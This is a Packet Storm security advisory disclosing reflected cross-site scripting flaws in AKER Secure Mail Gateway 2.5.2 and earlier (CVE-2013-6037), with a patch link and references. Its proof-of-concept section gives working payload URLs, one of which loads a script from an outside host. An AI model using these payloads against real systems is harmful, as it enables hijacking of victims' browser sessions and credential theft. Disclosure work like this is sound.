exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting
Posted Mar 7, 2014
Authored by William Costa

AKER Secure Mail Gateway versions 2.5.2 and below suffer from multiple reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2013-6037
SHA-256 | ab5924cb2e8e920bf0c586e1b34dba02ede340dc74de1607cbabdf1fa1986191

AKER Secure Mail Gateway 2.5.2 Cross Site Scripting

Change Mirror Download
XSS in url for access of Confirmation Required in box for antispam from
company AKER (CVE-2013-6037)

I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities in AKER SECURE MAIL GATEWAY <= v2.5.2

II. BACKGROUND
-------------------------
The Aker Secure Mail Gateway is a complete platform security e-mail

III. DESCRIPTION
-------------------------
Has been detected a reflected XSS vulnerability in Aker Secure Mail Gateway
<=2.5.2 , that allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser.
The code injection is done through the parameter "msg_id" and "content" in
the page index.php.


IV. PROOF OF CONCEPT
-------------------------
The application does not validate the double encoding of the "msg_id"
parameter correctly. Malicious Request ("msg_id")
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script>alert(String(/XSS/).substr(1,6)
); </script>
Vulnerable:
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><script
src=http://10.0.1.142:5005/xook.js></script>
Vulnerable:
http://vulnerablesite.com/webgui/cf/index.php?msg_id=89f52f83bdhhygaabdbayudefcff654abb2f097777/><iframe
src=http://www.google.com> </iframe>


V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-------------------------
Aker Secure Mail Gateway <= v2.5.2

VII. SOLUTION
-------------------------
http://download.aker.com.br/prod/current/atualizacoes/aker-secure-mail-gateway-2.5/patch-2/akersecuremailgateway-2.5-pt-box-patch-002-hotfix-023-0002.akp

References

http://www.kb.cert.org/vuls/id/687278
http://www.aker.com.br/
http://www.aker.com.br/produtos/aker-secure-mail-gateway
http://www.aker.com.br/atualizacoes-asmg?field_tipo_value=All

By Wiliam Costa
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close